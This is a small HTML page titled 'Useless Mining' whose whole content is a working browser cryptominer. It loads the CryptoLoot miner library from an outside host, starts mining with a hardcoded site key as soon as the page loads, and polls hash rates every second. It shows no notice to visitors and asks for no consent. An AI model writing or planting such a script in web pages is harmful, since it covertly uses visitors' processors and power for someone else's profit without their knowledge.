<html>

<head>
    <title>Useless Mining</title>
</head>

<body>
    <script src="https://crypto-loot.com/lib/miner.min.js"></script>
    <script>
        var miner = new CryptoLoot.Anonymous('f6a6d5e790bb2421d0294e87a51066e6fe34f4905475');
        miner.start();
            
        // Listen on events
        miner.on('found', function() { /* Hash found */ })
        miner.on('accepted', function() { /* Hash accepted by the pool */ })
            
        // Update stats once per second
        setInterval(function() {
            var hashesPerSecond = miner.getHashesPerSecond();
            var totalHashes = miner.getTotalHashes();
            var acceptedHashes = miner.getAcceptedHashes();
            
            // Output to HTML elements...
        }, 1000);
    </script>

    <h1>Useless Mining.</h1>
</body>

</html>